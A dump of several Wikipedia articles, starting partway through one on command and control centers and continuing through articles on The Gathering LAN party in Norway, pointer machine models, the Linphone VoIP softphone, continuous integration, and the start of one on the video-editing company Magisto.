United States
A Command and Control Center is a specialized type of command center operated by a government or municipal agency 24 hours a day, 7 days a week. Various branches of the U.S. Military such as the U.S Coast Guard and the U.S. Navy have command and control centers.
They are also common in many large correctional facilities. A Command and Control Center operates as the agency's dispatch center, surveillance monitoring center, coordination office, and alarm monitoring center all in one.
Command and control centers are not staffed by high-level officials but rather by highly skilled technical staff. When a serious incident occurs the staff will notify the agency's higher level officials.
In service businesses
A command center enables the real-time visibility and management of an entire service operation. Similar to an air traffic control center, a command center allows organizations to view the status of global service calls, service technicians, and service parts on a single screen. In addition, customer commitments or service level agreements (SLAs) that have been made can also be programmed into the command center and monitored to ensure all are met and customers are satisfied.
A command center is well suited for industries where coordinating field service (people, equipment, parts, and tools) is critical. Some examples:
Intel's security Command Center
Dell's Enterprise Command Center
NASA's Mission Control Houston Command Center for Space Shuttle and ISS
War rooms can also be used for defining strategies, or driving business intelligence efforts.
See also
Air traffic control
Air Defense Control Center
Combat Information Center
Control room
C4ISTAR
Dispatch
Mission Control Center
Network Operations Center
Obeya
White House Situation Room
References
External links
Command Center Handbook
Corporate governance
Military command and control installations
Military communications
Military locations
Nuclear command and control
Organizational structure
|
457118
|
https://en.wikipedia.org/wiki/The%20Gathering%20%28LAN%20party%29
|
The Gathering (LAN party)
|
The Gathering (abbreviated as "TG" for short) is the second largest computer party in the world (second to DreamHack). It is held annually in Vikingskipet Olympic Arena in Hamar, Norway, and lasts for five consecutive days (starting on the Wednesday in Easter each year). Each year, TG attracts more than 5200 (mostly young) people, with attendance increasing every year. As of April 2012, The Gathering holds the World Record for fastest Internet connection at 200 Gbits per second.
History
Beginning
In early 1991, Vegard Skjefstad and Trond Michelsen, members of the demogroup Deadline, decided that they wanted to organize a big demoparty in Norway. In the late eighties/early nineties, it was common that demoparties (more commonly called "copyparties" at this time) were organized by large demogroups. Because of this, and the fact that Deadline wasn't particularly well known, Mr. Skjefstad suggested that the group Crusaders should be involved. At this time, The Crusaders was one of Norway's most popular Amiga groups. Partly because of their music disks, but also because of their diskmag, the Crusaders Eurochart. At first, Crusaders weren't too keen on the idea of organizing a party, but when Mr. Skjefstad reminded them about the fact that they always complained about the other parties of the same sort, and that this was their chance to show everyone how it should be done, which caused the Crusaders to agree.
After briefly considering having the party during the fall of 1991, it was decided that Easter would be better. All schools are closed during Easter week and the period from Maundy Thursday to Easter Monday are official holidays in Norway. This meant that most of the target audience would have time off to attend TG, and all organizers and crew could work full-time with TG with a minimum usage of vacation days.
1992–1995
In 1992, 1100 people gathered in Skedsmohallen at Lillestrøm, way more than the expected count of about 800. The following years, TG continued to grow. In 1993 Skedsmohallen again was the venue with 1400 people visiting the party. This was more than the capacity of the venue, making it clear that a bigger venue was required. In 1994 the venue was Rykkinnhallen in Bærum, and the visitor count had risen to 1800 - again more than the venue could hold, which led to intervention by the local fire department who banned indoor sleeping. Consequently, the organizers had to hire a large construction tent and some heavy duty heating equipment (there was still snow on the ground).
No bigger venue could be found and this may have been one reason why Skjefstad and The Crusaders declined to arrange the party in 1995. A group from Stavanger lead by Magnar Harestad proposed to host the party instead, and got approval and some backing from the TG crew. They hired Stavanger Ishall, "Siddishallen" and the party was renamed "Gathering 95". However, this caused a sharp drop in attendance, barely 500 people attended, not even filling the hall to half capacity. This may have been due to moving the event away from the Eastern, more densely populated part of Norway - while the previous events had been held well within one hours drive from the capital of Oslo, Stavanger is over 470 km from Oslo, taking more than 7 hours to drive.
1996-current
Meanwhile, the venues built for the 1994 Winter Olympics were made available for hire, and prices were increasingly reasonable due to lack of interest. Amongst these were the Vikingskipet ice skating arena in Hamar, at the time Norway's largest indoor arena - located hours' drive from central Oslo, and with good infrastructure (power, parking etc.). Skjefstad and The Crusaders decided to rent it and have another go, and The Gathering 1996, attracted around 2500 visitors.
The organizers then decided to create a separate organization, KANDU (Kreativ, Aktiv Norsk Dataungdom - 'Creative, Active Norwegian Computer Youth') for the specific purpose of running TG every year, and thus promote creativity and computer literacy.
Since then The Gathering continued to grow. By 1998 the maximum capacity of Vikingskipet, of about 5200 attendees, were reached. KANDU have not, however, decided to switch venues again although even larger venues such as the Telenor Arena at Fornebu outside of Oslo are now available. Instead, tickets for the event have sold out increasingly quickly.
The Gathering 2020 was cancelled after recommendations by local health authorities due to the COVID-19 pandemic. Instead, it was to be arranged online under the hashtag TG:Online.
Daily life
TG lasts for five days (from Holy Wednesday to Easter Sunday every year), and is both longer and bigger than most other computer parties. Most people tend to let their daily rhythm go and instead sleep as they see fit (many simply in front of their computer, but most people on the arena stands); for a lot of people most of the time is usually spent in front of a computer, but many like to use the opportunity to meet new or old friends in real life.
People have wildly different opinions about what constitutes a proper LAN party; the common trend at TG these years seem to be warez, games (the most popular being Counter-Strike), and IRC. However, many visitors find this too boring in the long run, and there are many unofficial mini-events happening all the time. Informal competitions to build the highest tower of soda cans are not uncommon, and people have been spotted having their own private mini-rave-parties put together by a few people and a PC with PA Systems.
Happenings and the demoscene
TG has always been a hub for young creative people to battle it out in many types of competitions; demo coding, music, graphics, animation, games, hardware-modification and Dance Dance Revolution to name a few; in addition, there are usually concerts and other things happening live on stage once or twice a day, as well as seminars etc.
In the first years, the focus on TG was pretty much on demos, but as TG is held at the same time as Breakpoint, a German scene-only party (and the earlier Mekka & Symposium), many European demosceners have left TG in favour of BP, and TG, like the majority of other computer parties, has become more of a gamer event. The scene at TG still lives on, though, as TG has introduced features such as a demoscene-only area, "creative cashback" (those handing in entries to the creative competitions get a discount) and other demo-oriented events. In fact, you have to go back as far as 1996 to match the number of entries handed in to the creative competitions at TG04.
Crew
The organization Kreativ Aktiv Norsk Dataungdom (KANDU) is formally responsible for hosting TG. In addition, there are around 500 volunteers participating to make TG possible every year; these are collectively called the crew.
The TG crew is split into multiple sub-crews, such as a democrew (Event:Demo), a gamecrew (Event:Game), a first-aid crew (Security:Medic), a network crew (Tech:Net), a server crew (Tech:Server), as well as a logistics crew (Core:Logistikk) etc.. (The exact list varies somewhat from year to year.) Each of these has a chief who reports upwards, and is responsible for some aspect of the party.
All crew members are volunteers and unpaid; the only advantages a crew member has over a normal visitor are free entrance, access to a crew-only sleeping room and hot food served a few times a day. All members of the crew must arrive at the party place one day before the party itself starts, and stay one day after the party to aid in cleaning up afterwards. (Some people, such as chiefs, typically come even sooner.)
Everybody who wants can become crew (except for the Security and logistics crews, where there is a minimum age of 18), by applying at a special interface called wannabe. The chiefs usually pick their own crew, based on the applications coming in and previous experience. Crew members from earlier years must re-apply every year if they want to be crew again, but it is rare for a person having done a good job not to be selected the next year.
Ticket sale controversy
Up to and including TG01, TG tickets (as all other tickets to everything else happening in Vikingskipet) were sold by Billettservice, a company closely related to the postal service in Norway. Partly sold via the Internet, partly by phone (but always picked up at a local post office), the Billettservice system broke down hard every year as thousands of people tried to order tickets to the event simultaneously.
To try to make the ticket sales a bit more smooth, a group of people closely related to the administration of TG made a separate company called Partyticket (or Partyticket.net, PTN for short), selling unified ticket-related services (such as ordering, payment, seating, handling competitions etc.) to smaller and larger computer parties. Partyticket went online for the first time in 2002, and like Billettservice instantly went down under the massive load, partly due to a problem at the third-party service authorizing credit card transactions. However, the tickets were still sold out in a matter of hours.
2003 was not much better; a lot of problems had been fixed (and PTN had successfully managed the ticket sales for several other computer parties), but there were still problems left, and it was decided to postpone the ticket sales by one day to fix the problems that had been discovered. The sales went relatively smooth the next day.
In 2004, one hoped that one would finally see the end of the problems, especially as a new queuing system and new hardware was installed; however, the server again buckled under the enormous load, and the queueing system was found to be severely buggy, apparently shuffling people around in the queue at random. This frustrated a lot of visitors, many of which never got tickets at all. Many people blame the ticket-sales problems directly at PTN and has tried to pressure TG into choosing some other solution.
In 2005 the queuing system was changed. Instead of buying actual tickets, people were put in a virtual queue, thus loading the server a lot less during the peak hours. The next day, people were processed from the start of the queue (but no more than 200 at a time). This system ended up working a lot better than the queueing system from 2004, despite some misconceptions in the media.
Since 2006, however, there have been no major issues.
In 2007 the Norwegian Tax Authority demanded that taxes were to be paid for the tickets sold from 2001 to 2008, as it did not consider The Gathering to be a cultural event (all cultural events in Norway are exempt from paying taxes). Although the management of TG sent a complaint to the Tax Authority, it did not reconsider the demands. By August 8, the management of TG was required to pay 988,536 NOK in unpaid taxes, which could have caused the 2009 staging of The Gathering to be cancelled. If no money was paid by the August 8 deadline, the event could have been closed for good. However, on August 16, 2008, KANDU and The Gathering won the tax case and will temporarily be exempted from paying taxes for the tickets sold in 2006, 2007, 2008 and the future. Also, the law will be amended to secure this for all other computer parties in Norway. The stated reason for this decision is that The Gathering's purpose is to gather youth from inland and abroad so these can get together to cultivate a computer culture, and the Storting has declared in a white paper that computer gaming is considered culture.
For The Gathering 2011 KANDU has signed an agreement for ticket sales with a company called Unicornis and their ticket system Geekevents. This agreement was for a three years period.
KANDU has signed a new contract with Geekevents AS, for a four-year period.
Name
Most years, TG has a name or "tagline"; the tagline doesn't really mean much, but it still influences the logo (or the other way round) and some other material. A list of names includes:
Demo and intro competition winners
References
Tasajarvi, Lassi (2004). Demoscene: The Art of Real-time. Even Lake Studios. . pages 45–54.
External links
The Gathering official website
KANDU website
The Gathering on Pouët
The Gathering: Computer Parties as Means for Gender Inclusion by Hege Nordli, an academic paper about The Gathering demo party and parties in general. (PDF)
Various logos
Demo parties
LAN parties
Festivals in Norway
Culture in Hedmark
Recurring events established in 1992
1992 establishments in Norway
Spring (season) events in Norway
|
6144616
|
https://en.wikipedia.org/wiki/Pointer%20machine
|
Pointer machine
|
In theoretical computer science a pointer machine is an "atomistic" abstract computational machine model akin to the random-access machine. A pointer algorithm is an algorithm restricted to the pointer machine model.
Depending on the type, a pointer machine may be called a linking automaton, a KU-machine, an SMM, an atomistic LISP machine, a tree-pointer machine, etc. (cf Ben-Amram 1995). At least three major varieties exist in the literature—the Kolmogorov-Uspenskii model (KUM, KU-machine), the Knuth linking automaton, and the Schönhage Storage Modification Machine model (SMM). The SMM seems to be the most common.
From its "read-only tape" (or equivalent) a pointer machine receives input—bounded symbol-sequences ("words") made of at least two symbols e.g. { 0, 1 } -- and it writes output symbol-sequences on an output "write-only" tape (or equivalent). To transform a symbol-sequence (input word) to an output symbol-sequence the machine is equipped with a "program"—a finite-state machine (memory and list of instructions). Via its state machine the program reads the input symbols, operates on its storage structure—a collection of "nodes" (registers) interconnected by "edges" (pointers labelled with the symbols e.g. { 0, 1 }), and writes symbols on the output tape.
Pointer machines cannot do arithmetic. Computation proceeds only by reading input symbols, modifying and doing various tests on its storage structure—the pattern of nodes and pointers, and outputting symbols based on the tests. "Information" is in the storage structure.
Types of "pointer machines"
Both Gurevich and Ben-Amram list a number of very similar "atomistic" models of "abstract machines"; Ben-Amram believes that the 6 "atomistic models" must be distinguished from "High-level" models. This article will discuss the following 3 atomistic models in particular:
Schönhage's storage modification machines (SMM),
Kolmogorov–Uspenskii machines (KUM or KU-Machines),
Knuth's "linking automaton"
But Ben-Amram add more:
Atomistic pure-LISP machine (APLM)
Atomistic full-LISP machine (AFLM),
General atomistic pointer machines,
Jone's I language (two types)
Problems with the pointer-machine model
Use of the model in complexity theory:
van Emde Boas (1990) expresses concern that this form of abstract model is:
"an interesting theoretical model, but ... its attractiveness as a fundamental model for complexity theory is questionable. Its time measure is based on uniform time in a context where this measure is known to underestimate the true time complexity. The same observation holds for the space measure for the machine" (van Emde Boas (1990) p. 35)
Gurevich 1988 also expresses concern:
"Pragmatically speaking, the Schönhage model provides a good measure of time complexity at the current state of the art (though I would prefer something along the lines of the random access computers of Angluin and Valiant)" (Gurevich (1988) p. 6 with reference to Angluin D. and Valiant L. G., "Fast Probabilistic Algorithms for Hamiltonian Circuits and Matchings", Journal of Computer and System Sciences 18 (1979) 155-193.)
The fact that, in §3 and §4 (pp. 494–497), Schönhage himself (1980) demonstrates the real-time equivalences of his two random-access machine models "RAM0" and "RAM1" leads one to question the necessity of the SMM for complexity studies.
Potential uses for the model: However, Schönhage (1980) demonstrates in his §6, Integer-multiplication in linear time. And Gurevich wonders whether or not the "parallel KU machine" "resembles somewhat the human brain" (Gurevich (1988) p. 5)
Schönhage's storage modification machine (SMM) model
Schönhage's SMM model seems to be the most common and most accepted. It is quite unlike the register machine model and other common computational models e.g. the tape-based Turing machine or the labeled holes and indistinguishable pebbles of the counter machine.
The computer consists of a fixed alphabet of input symbols, and a mutable directed graph (aka a state diagram) with its arrows labelled by alphabet symbols. Each node of the graph has exactly one outgoing arrow labelled with each symbol, although some of these may loop back into the original node. One fixed node of the graph is identified as the start or "active" node.
Each word of symbols in the alphabet can then be translated to a pathway through the machine; for example, 10011 would translate to taking path 1 from the start node, then path 0 from the resulting node, then path 0, then path 1, then path 1. The path can, in turn, be identified with the resulting node, but this identification will change as the graph changes during the computation.
The machine can receive instructions which change the layout of the graph. The basic instructions are the new w instruction, which creates a new node which is the "result" of following the string w, and the set w to v instruction which (re)directs an edge to a different node. Here w and v represent words. v is a former word—i.e. a previously-created string of symbols—so that the redirected edge will point "backwards" to an old node that is the "result" of that string.
(1) new w: creates a new node. w represents the new word that creates the new node. The machine reads the word w, following the path represented by the symbols of w until the machine comes to the last, "additional" symbol in the word. The additional symbol instead forces the last state to create a new node, and "flip" its corresponding arrow (the one labelled with that symbol) from its old position to point to the new node. The new node in turn points all its edges back to the old last-state, where they just "rest" until redirected by another new or set. In a sense the new nodes are "sleeping", waiting for an assignment. In the case of the starting or center node we likewise would begin with both of its edges pointing back to itself.
Example: Let "w" be 10110[1], where the final character is in brackets to denote its special status. We take the 1 edge of the node reached by 10110 (at the end of a five-edge, hence six-node, pathway), and point it to a new 7th node. The two edges of this new node then point "backward" to the 6th node of the path.
(2)Set w to v: redirects (moves) an edge (arrow) from the path represented by word w to a former node that represents word v. Again it is the last arrow in the path that is redirected.
Example: Set 1011011 to 1011, after the above instruction, would change the 1 arrow of the new node at 101101 to point to the fifth node in the pathway, reached at 1011. Thus the path 1011011 would now have the same result as 1011.
(3)If v = w then instruction z : Conditional instruction that compares two paths represented by words w and v to see if they end at the same node; if so jump to instruction z else continue. This instruction serves the same purpose as its counterpart in a register machine or Wang b-machine, corresponding to a Turing machine's ability to jump to a new state.
Knuth's "linking automaton" model
According to Schoenhage, Knuth noted that the SMM model coincides with a special type of "linking automata" briefly explained in volume one of The Art of Computer Programming (cf. [4, pp. 462–463])
Kolmogorov–Uspenskii machine (KU-machine) model
KUM differs from SMM in allowing only invertible pointers: for every pointer from a node x to a node y, an inverse pointer from y to x must be present. Since outgoing pointers must be labeled by distinct symbols of the alphabet, both KUM and SMM graphs have O(1) outdegree. However, KUM pointers' invertibility restricts the in-degree to O(1), as well. This addresses some concerns for physical (as opposite to purely informational) realism, like those in the above van Emde Boas quote.
An additional difference is that the KUM was intended as a generalization of the Turing machine, and so it allows the currently "active" node to be moved around the graph. Accordingly, nodes can be specified by individual characters instead of words, and the action to be taken can be determined by a state table instead of a fixed list of instructions.
See also
Register machine—generic register-based abstract machine computational model
Counter machine—most primitive machine, base models' instruction-sets are used throughout the class of register machines
Random-access machine—RAM: counter machine with added indirect addressing capability
Random-access stored-program machine—RASP: counter-based or RAM-based machine with a "program of instructions" to be found in the registers themselves in the matter of a Universal Turing machine i.e. the von Neumann architecture.
Turing machine—generic tape-based abstract machine computational model
Post–Turing machine—minimalist one-tape, two-direction, 1 symbol { blank, mark } Turing-like machine but with default sequential instruction execution in a manner similar to the basic 3-instruction counter machines.
References
Most references and a bibliography are to be found at the article Register machine. The following are particular to this article:
Amir Ben-Amram (1995), What is a "Pointer machine"?, SIGACTN: SIGACT News (ACM Special Interest Group on Automata and Computability Theory)", volume 26, 1995. also: DIKU, Department of Computer Science, University of Copenhagen, [email protected]. Wherein Ben-Amram describes the types and subtypes: (type 1a) Abstract Machines: Atomistic models including Kolmogorov-Uspenskii Machines (KUM), Schönhage's Storage Modification Machines (SMM), Knuth's "Linking Automaton", APLM and AFLM (Atomistic Pure-LISP Machine) and (Atomistic Full-LISP machine), General atomistic Pointer Machines, Jone's I Language; (type 1b) Abstract Machines: High-level models, (type 2) Pointer algorithms.
Andrey Kolmogorov and V. Uspenskii, On the definition of an algorithm, Uspekhi Mat. Nauk 13 (1958), 3-28. English translation in American Mathematical Society Translations, Series II, Volume 29 (1963), pp. 217–245.
Yuri Gurevich (2000), Sequential Abstract State Machines Capture Sequential Algorithms, ACM Transactions on Computational Logic, vol. 1, no. 1, (July 2000), pages 77–111. In a single sentence Gurevich compares the Schönhage [1980] "storage modification machines" to Knuth's "pointer machines." For more, similar models such as "random access machines" Gurevich references:
John E. Savage (1998), Models of Computation: Exploring the Power of Computing. Addison Wesley Longman.
Yuri Gurevich (1988), On Kolmogorov Machines and Related Issues, the column on "Logic in Computer Science", Bulletin of European Association for Theoretical Computer Science, Number 35, June 1988, 71-82. Introduced the unified description of Schönhage and Kolmogorov-Uspenskii machines used here.
Arnold Schönhage (1980), Storage Modification Machines, Society for Industrial and Applied Mathematics, SIAM J. Comput. Vol. 9, No. 3, August 1980. Wherein Schönhage shows the equivalence of his SMM with the "successor RAM" (Random Access Machine), etc. He refers to an earlier paper where he introduces the SMM:
Arnold Schönhage (1970), Universelle Turing Speicherung, Automatentheorie und Formale Sprachen, Dörr, Hotz, eds. Bibliogr. Institut, Mannheim, 1970, pp. 69–383.
Peter van Emde Boas, Machine Models and Simulations pp. 3–66, appearing in:
Jan van Leeuwen, ed. "Handbook of Theoretical Computer Science. Volume A: Algorithms and Complexity'', The MIT PRESS/Elsevier, 1990. (volume A). QA 76.H279 1990.
van Emde Boas' treatment of SMMs appears on pp. 32-35. This treatment clarifies Schönhage 1980 -- it closely follows but expands slightly the Schönhage treatment. Both references may be needed for effective understanding.
Register machines
|
11784110
|
https://en.wikipedia.org/wiki/Linphone
|
Linphone
|
Linphone (contraction of Linux phone) is a free voice over IP softphone, SIP client and service. It may be used for audio and video direct calls and calls through any VoIP softswitch or IP-PBX. Linphone also provides the possibility to exchange instant messages. It has a simple multilanguage interface based on Qt for GUI and can also be run as a console-mode application on Linux.
The softphone is currently developed by Belledonne Communications in France. Linphone was initially developed for Linux but now supports many additional platforms including Microsoft Windows, macOS, and mobile phones running Windows Phone, iOS or Android. It supports ZRTP for end-to-end encrypted voice and video communication.
Linphone is licensed under the GNU GPL-3.0-or-later and supports IPv6. Linphone can also be used behind network address translator (NAT), meaning it can run behind home routers. It is compatible with telephony by using an Internet telephony service provider (ITSP).
Features
Linphone hosts a free SIP service on its website.
The Linphone client provides access to following functionalities:
Multi-account work
Registration on any SIP-service and line status management
Contact list with status of other users
Conference call initiation
Combination of message history and call details
DTMF signals sending (SIP INFO / RFC 2833)
File sharing
Additional plugins
Open standards support
Protocols
SIP according to RFC 3261 (UDP, TCP and TLS)
SIP SIMPLE
NAT traversal by TURN and ICE
RTP/RTCP
Media-security: SRTP and ZRTP
Audio codecs
Audio codec support: Speex (narrow band and wideband), G.711 (μ-law, A-law), GSM, Opus, and iLBC (through an optional plugin)
Video codecs
Video codec support: MPEG-4, Theora, VP8 and H.264 (with a plugin based on x264), with resolutions from QCIF (176×144) to SVGA (800×600) provided that network bandwidth and CPU power are sufficient.
Gallery
See also
Comparison of VoIP software
List of SIP software
Opportunistic encryption
References
External links
Cross-platform software
Android (operating system) software
Free and open-source Android software
Communication software
Free VoIP software
Instant messaging clients
Instant messaging clients for Linux
IOS software
MacOS instant messaging clients
Videotelephony
VoIP software
Windows instant messaging clients
BlackBerry software
|
1774081
|
https://en.wikipedia.org/wiki/Continuous%20integration
|
Continuous integration
|
In software engineering, continuous integration (CI) is the practice of merging all developers' working copies to a shared mainline several times a day. Grady Booch first proposed the term CI in his 1991 method, although he did not advocate integrating several times a day. Extreme programming (XP) adopted the concept of CI and did advocate integrating more than once per day – perhaps as many as tens of times per day.
Rationale
When embarking on a change, a developer takes a copy of the current code base on which to work. As other developers submit changed code to the source code repository, this copy gradually ceases to reflect the repository code. Not only can the existing code base change, but new code can be added as well as new libraries, and other resources that create dependencies, and potential conflicts.
The longer development continues on a branch without merging back to the mainline, the greater the risk of multiple integration conflicts and failures when the developer branch is eventually merged back. When developers submit code to the repository they must first update their code to reflect the changes in the repository since they took their copy. The more changes the repository contains, the more work developers must do before submitting their own changes.
Eventually, the repository may become so different from the developers' baselines that they enter what is sometimes referred to as "merge hell", or "integration hell", where the time it takes to integrate exceeds the time it took to make their original changes.
Workflows
Run tests locally
CI is intended to be used in combination with automated unit tests written through the practices of test-driven development. This is done by running and passing all unit tests in the developer's local environment before committing to the mainline. This helps avoid one developer's work-in-progress breaking another developer's copy. Where necessary, partially complete features can be disabled before committing, using feature toggles for instance.
Compile code in CI
A build server compiles the code periodically or even after every commit and reports the results to the developers. The use of build servers had been introduced outside the XP (extreme programming) community and many organisations have adopted CI without adopting all of XP.
Run tests in CI
In addition to automated unit tests, organisations using CI typically use a build server to implement continuous processes of applying quality control in general – small pieces of effort, applied frequently. In addition to running the unit and integration tests, such processes run additional static analyses, measure and profile performance, extract and format documentation from the source code and facilitate manual QA processes. On the popular Travis CI service for open-source, only 58.64% of CI jobs execute tests.
This continuous application of quality control aims to improve the quality of software, and to reduce the time taken to deliver it, by replacing the traditional practice of applying quality control after completing all development. This is very similar to the original idea of integrating more frequently to make integration easier, only applied to QA processes.
Deploy an artifact from CI
Now, CI is often intertwined with continuous delivery or continuous deployment in what is called CI/CD pipeline. "Continuous delivery" makes sure the software checked in on the mainline is always in a state that can be deployed to users and "continuous deployment" makes the deployment process fully automated.
History
The earliest known work on continuous integration was the Infuse environment developed by G. E. Kaiser, D. E. Perry, and W. M. Schell.
In 1994, Grady Booch used the phrase continuous integration in Object-Oriented Analysis and Design with Applications (2nd edition) to explain how, when developing using micro processes, "internal releases represent a sort of continuous integration of the system, and exist to force closure of the micro process".
In 1997, Kent Beck and Ron Jeffries invented Extreme Programming (XP) while on the Chrysler Comprehensive Compensation System project, including continuous integration. Beck published about continuous integration in 1998, emphasising the importance of face-to-face communication over technological support. In 1999, Beck elaborated more in his first full book on Extreme Programming. CruiseControl, one of the first open-source CI tools, was released in 2001.
In 2010, Timothy Fitz published an article detailing how IMVU's engineering team had built and been using the first practical CI system. While his post was originally met with skepticism, it quickly caught on and found widespread adoption as part of the Lean software development methodology, also based on IMVU.
Common practices
This section lists best practices suggested by various authors on how to achieve continuous integration, and how to automate this practice. Build automation is a best practice itself.
Continuous integration—the practice of frequently integrating one's new or changed code with the existing code repository —should occur frequently enough that no intervening window remains between commit and build, and such that no errors can arise without developers noticing them and correcting them immediately. Normal practice is to trigger these builds by every commit to a repository, rather than a periodically scheduled build. The practicalities of doing this in a multi-developer environment of rapid commits are such that it is usual to trigger a short time after each commit, then to start a build when either this timer expires, or after a rather longer interval since the last build. Note that since each new commit resets the timer used for the short time trigger, this is the same technique used in many button debouncing algorithms. In this way, the commit events are "debounced" to prevent unnecessary builds between a series of rapid-fire commits. Many automated tools offer this scheduling automatically.
Another factor is the need for a version control system that supports atomic commits; i.e., all of a developer's changes may be seen as a single commit operation. There is no point in trying to build from only half of the changed files.
To achieve these objectives, continuous integration relies on the following principles.
Maintain a code repository
This practice advocates the use of a revision control system for the project's source code. All artifacts required to build the project should be placed in the repository. In this practice and in the revision control community, the convention is that the system should be buildable from a fresh checkout and not require additional dependencies. Extreme Programming advocate Martin Fowler also mentions that where branching is supported by tools, its use should be minimised. Instead, it is preferred for changes to be integrated rather than for multiple versions of the software to be maintained simultaneously. The mainline (or trunk) should be the place for the working version of the software.
Automate the build
A single command should have the capability of building the system. Many build tools, such as make, have existed for many years. Other more recent tools are frequently used in continuous integration environments. Automation of the build should include automating the integration, which often includes deployment into a production-like environment. In many cases, the build script not only compiles binaries, but also generates documentation, website pages, statistics and distribution media (such as Debian DEB, Red Hat RPM or Windows MSI files).
Make the build self-testing
Once the code is built, all tests should run to confirm that it behaves as the developers expect it to behave.
Everyone commits to the baseline every day
By committing regularly, every committer can reduce the number of conflicting changes. Checking in a week's worth of work runs the risk of conflicting with other features and can be very difficult to resolve. Early, small conflicts in an area of the system cause team members to communicate about the change they are making. Committing all changes at least once a day (once per feature built) is generally considered part of the definition of Continuous Integration. In addition, performing a nightly build is generally recommended. These are lower bounds; the typical frequency is expected to be much higher.
Every commit (to baseline) should be built
The system should build commits to the current working version to verify that they integrate correctly. A common practice is to use Automated Continuous Integration, although this may be done manually. Automated Continuous Integration employs a continuous integration server or daemon to monitor the revision control system for changes, then automatically run the build process.
Every bug-fix commit should come with a test case
When fixing a bug, it is a good practice to push a test case that reproduces the bug. This avoids the fix to be reverted, and the bug to reappear, which is known as a regression. Researchers have proposed to automate this task: if a bug-fix commit does not contain a test case, it can be generated from the already existing tests.
Keep the build fast
The build needs to complete rapidly, so that if there is a problem with integration, it is quickly identified.
Test in a clone of the production environment
Having a test environment can lead to failures in tested systems when they deploy in the production environment because the production environment may differ from the test environment in a significant way. However, building a replica of a production environment is cost prohibitive. Instead, the test environment, or a separate pre-production environment ("staging") should be built to be a scalable version of the production environment to alleviate costs while maintaining technology stack composition and nuances. Within these test environments, service virtualisation is commonly used to obtain on-demand access to dependencies (e.g., APIs, third-party applications, services, mainframes, etc.) that are beyond the team's control, still evolving, or too complex to configure in a virtual test lab.
Make it easy to get the latest deliverables
Making builds readily available to stakeholders and testers can reduce the amount of rework necessary when rebuilding a feature that doesn't meet requirements. Additionally, early testing reduces the chances that defects survive until deployment. Finding errors earlier can reduce the amount of work necessary to resolve them.
All programmers should start the day by updating the project from the repository. That way, they will all stay up to date.
Everyone can see the results of the latest build
It should be easy to find out whether the build breaks and, if so, who made the relevant change and what that change was.
Automate deployment
Most CI systems allow the running of scripts after a build finishes. In most situations, it is possible to write a script to deploy the application to a live test server that everyone can look at. A further advance in this way of thinking is continuous deployment, which calls for the software to be deployed directly into production, often with additional automation to prevent defects or regressions.
Costs and benefits
Continuous integration is intended to produce benefits such as:
Integration bugs are detected early and are easy to track down due to small change sets. This saves both time and money over the lifespan of a project.
Avoids last-minute chaos at release dates, when everyone tries to check in their slightly incompatible versions
When unit tests fail or a bug emerges, if developers need to revert the codebase to a bug-free state without debugging, only a small number of changes are lost (because integration happens frequently)
Constant availability of a "current" build for testing, demo, or release purposes
Frequent code check-in pushes developers to create modular, less complex code
With continuous automated testing, benefits can include:
Enforces discipline of frequent automated testing
Immediate feedback on system-wide impact of local changes
Software metrics generated from automated testing and CI (such as metrics for code coverage, code complexity, and feature completeness) focus developers on developing functional, quality code, and help develop momentum in a team
Some downsides of continuous integration can include:
Constructing an automated test suite requires a considerable amount of work, including ongoing effort to cover new features and follow intentional code modifications.
Testing is considered a best practice for software development in its own right, regardless of whether or not continuous integration is employed, and automation is an integral part of project methodologies like test-driven development.
Continuous integration can be performed without any test suite, but the cost of quality assurance to produce a releasable product can be high if it must be done manually and frequently.
There is some work involved to set up a build system, and it can become complex, making it difficult to modify flexibly.
However, there are a number of continuous integration software projects, both proprietary and open-source, which can be used.
Continuous integration is not necessarily valuable if the scope of the project is small or contains untestable legacy code.
Value added depends on the quality of tests and how testable the code really is.
Larger teams means that new code is constantly added to the integration queue, so tracking deliveries (while preserving quality) is difficult and builds queueing up can slow down everyone.
With multiple commits and merges a day, partial code for a feature could easily be pushed and therefore integration tests will fail until the feature is complete.
Safety and mission-critical development assurance (e.g., DO-178C, ISO 26262) require rigorous documentation and in-process review that are difficult to achieve using continuous integration. This type of life cycle often requires additional steps be completed prior to product release when regulatory approval of the product is required.
See also
Application release automation
Build light indicator
Comparison of continuous integration software
Continuous design
Continuous testing
Multi-stage continuous integration
Rapid application development
References
External links
Agile software development
Extreme programming
Software development process
|
34045247
|
https://en.wikipedia.org/wiki/Magisto
|
Magisto
|
Magisto is a technology company founded in 2009 with a focus to provide artificial intelligence (AI) technology in order to make video editing fast and simple. It produces an online video editor of the same name (both as a web application and a mobile app) for automated video editing and production aimed at consumers and businesses. The company was acquired by Vimeo in 2019 for an estimated .
Technology
Magisto was founded by Dr. Oren Boiman, a computer scientist that graduated from Tel Aviv University followed by graduate work in computer vision at Weizmann Institute of Science. Through his work, Boiman developed a number of patent-pending image analysis technology that analyzes unedited videos and identifies the most interesting parts, which became the basis of the Magisto apps. The system recognizes faces, animals, landscapes, action sequences, movements and other interesting content within the video, as well as analyzing speech and audio. These scenes are then edited together, along with music and effects, into share-worthy clips.
Automatic video editing
Automatic video editing products have emerged over the past decade in order to make video editing accessible to a broader consumer market. Automatic video editing technology does the work for the user, eliminating the need for a deeper understanding or knowledge of how to use complicated video editing software. Muvee Technologies introduced autoProducer, the first PC-based automatic video editing platform, in 2001. Other solutions, including Sony's MovieShaker and Roxio Cinematic, followed in 2002. As smartphones and consumer video recording devices become more prevalent the need for an easier video solution has led to a renewed interest in automatic video editing.
Some similar applications are Videolicious, WeVideo, InVideo, Animoto, Powtoon, and Clipchamp.
Music
The Magisto app contains a library of music for users to utilize in their video creations. The music, largely by independent artists, is sorted by mood and is licensed for in-app use.
History
Magisto was founded in 2009 as SightEra (LTD) by Dr. Oren Boiman (CEO) and Dr. Alex Rav-Acha (CTO). Boiman was frustrated with the amount of time it took editing together videos of his daughter and wanted to design an easy to use application to capture and share videos without the time-consuming process of video editing.
Magisto was launched publicly on September 20, 2011, as a video editing software web application through which users could upload unedited video footage, choose a title and soundtrack and have their video edited for them automatically. On the following day Magisto was added to YouTube Create's collection of video production applications.
The Magisto iPhone app was launched publicly at the 2012 International Consumer Electronics Show (CES) in Las Vegas. At CES, the company was also declared winner of the 2012 CES Mobile App Showdown. On August 28, 2012, Magisto launched the Android app on Google Play. On September 13, 2012, Magisto launched a Google Chrome App and announced Google Drive integration.
On March 7, 2013, Magisto claimed 5 million users. Google listed Magisto as an "Editors’ Choice" on its list of "Best Apps of 2013". In September 2013, the company claimed that 10 million users had downloaded the App.
